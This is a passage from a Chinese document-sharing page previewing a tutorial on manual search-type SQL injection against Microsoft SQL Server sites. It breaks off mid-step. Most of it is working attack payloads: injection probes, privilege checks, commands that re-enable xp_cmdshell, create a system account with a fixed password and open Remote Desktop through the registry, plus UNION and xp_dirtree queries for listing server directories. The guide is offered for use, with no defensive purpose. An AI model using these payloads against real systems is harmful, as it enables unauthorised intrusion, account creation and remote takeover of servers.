总结搜索型手工注入的全过程.docVIP

  1. 1、原创力文档(book118)网站文档一经付费(服务费),不意味着购买了该文档的版权,仅供个人/单位学习、研究之用,不得用于商业用途,未经授权,严禁复制、发行、汇编、翻译或者网络传播等,侵权必究。。
  2. 2、本站所有内容均由合作方或网友上传,本站不对文档的完整性、权威性及其观点立场正确性做任何保证或承诺!文档内容仅供研究参考,付费前请自行鉴别。如您付费,意味着您自己接受本站规则且自行承担风险,本站不退款、不进行额外附加服务;查看《如何避免下载的几个坑》。如果您已付费下载过本站文档,您可以点击 这里二次下载
  3. 3、如文档侵犯商业秘密、侵犯著作权、侵犯人身权等,请点击“版权申诉”(推荐),也可以打举报电话:400-050-0827(电话支持时间:9:00-18:30)。
  4. 4、该文档为VIP文档,如果想要下载,成为VIP会员后,下载免费。
  5. 5、成为VIP后,下载本文档将扣除1次下载权益。下载后,不支持退款、换文档。如有疑问请联系我们
  6. 6、成为VIP后,您将拥有八大权益,权益包括:VIP文档下载权益、阅读免打扰、文档格式转换、高级专利检索、专属身份标志、高级客服、多端互通、版权登记。
  7. 7、VIP文档为合作方或网友上传,每下载1次, 网站将根据用户上传文档的质量评分、类型等,对文档贡献者给予高额补贴、流量扶持。如果你也想贡献VIP文档。上传文档
查看更多
总结搜索型手工注入的全过程

总结搜索型手工注入的全过程 首先,简单的判断搜索型注入漏洞存在不存在的办法是先搜索,如果出错,说明90%存在这个漏洞。 a% and 1=1-- 正常 a% and 1=2-- 错误 有注入 由于网站过滤了 等等的。所以工具不行,要手工了。累人啊~~~ 判断权限 a% and (select is_member(dbo))=1-- 返回正常则 sa a% and (select is_member(db_owner))=1-- 返回正常则 DB 都不是那就只有一种可能啦,public,权限貌似很小。 也可以用另一种命令来判断权限 a% and 1=(Select IS_SRVROLEMEMBER(sysadmin));-- sa a% and 1=(Select IS_MEMBER(db_owner));-- DB ====================================================================================== sa 的方法。直接建立系统帐号密码。登陆3389. 命令是 a%;exec master..xp_cmdshellnet user admins 123456 /add-- 如果 xp_cmdshell 被关闭了。就来开启他。 EXEC sp_configure show advanced options, 1;RECONFIGURE;EXEC sp_configure xp_cmdshell, 1;RECONFIGURE;reconfigure 最后这个为1是开启.为0是关闭. a% ;EXEC sp_configure show advanced options, 1;RECONFIGURE;EXECsp_configure xp_cmdshell, 1;RECONFIGURE-- 如果不开3389 下面的命令。。 a%;exec master.dbo.xp_regwriteHKEY_LOCAL_MACHINE,SYSTEM\CurrentControlSet\Control\Terminal Server,fDenyTSConnections,REG_DWORD,0;-- ====================================================================================== db 的方法 主要思路是列目录-差异备份 还有需要库名。想办法弄出来。 首先列目录 a% order by XX-- 自己猜 例如 12 然后 a% and 1=2 union select 1,2,3,4,5,6,7,8,9,10,11,12-- 找到字符类型的,能显示出来的 比如 5 《MSSQL手工注入目录查找辅助工具》这个自己百度去哈。。。 用 天阳的《MSSQL手工注入目录查找辅助工具》 生成列目录的代码 现在例如生成的是C盘的 然后 a% ;drop table t_tian6 create table t_tian6(fn nvarchar(4000),d int,f int) declare @root nvarchar(4000) set @root=0x43003A00 insert into t_tian6 exec master..xp_dirtree @root,1,1 update t_tian6 set fn=fn+char(92) where f=0 drop table t_tian6_1 create tabLe t_tian6_1(f nvarchar(4000))-- //建立插入表数据 然后 a% ;declare @fn nvarchar(400),@f int,@r nvarchar(4000) set @r=char(9) declare cr cursor for select fn,f from t_tian6 order by f,fn open cr fetch cr into @fn,@f while @@fetch_status=0 begin set @r=@r+@fn+char(9) fetch cr into @fn,@f end close cr deallocate cr insert intO t_tian6_1(f) values(@r)-- //远程整理 然后 a% and 1=2 union select 1,2,3,4,(select top 1 f from t_tian6_1),6,7,8,9,10,11,12-- 获取结果。就显示出来路径了。 接下来就是 继续 用 《MSSQL手工注入目录查找辅助工具

文档评论(0)

jgx3536 + 关注
实名认证
文档贡献者

该用户很懒,什么也没介绍

版权声明书
用户编号:6111134150000003

1亿VIP精品文档

相关文档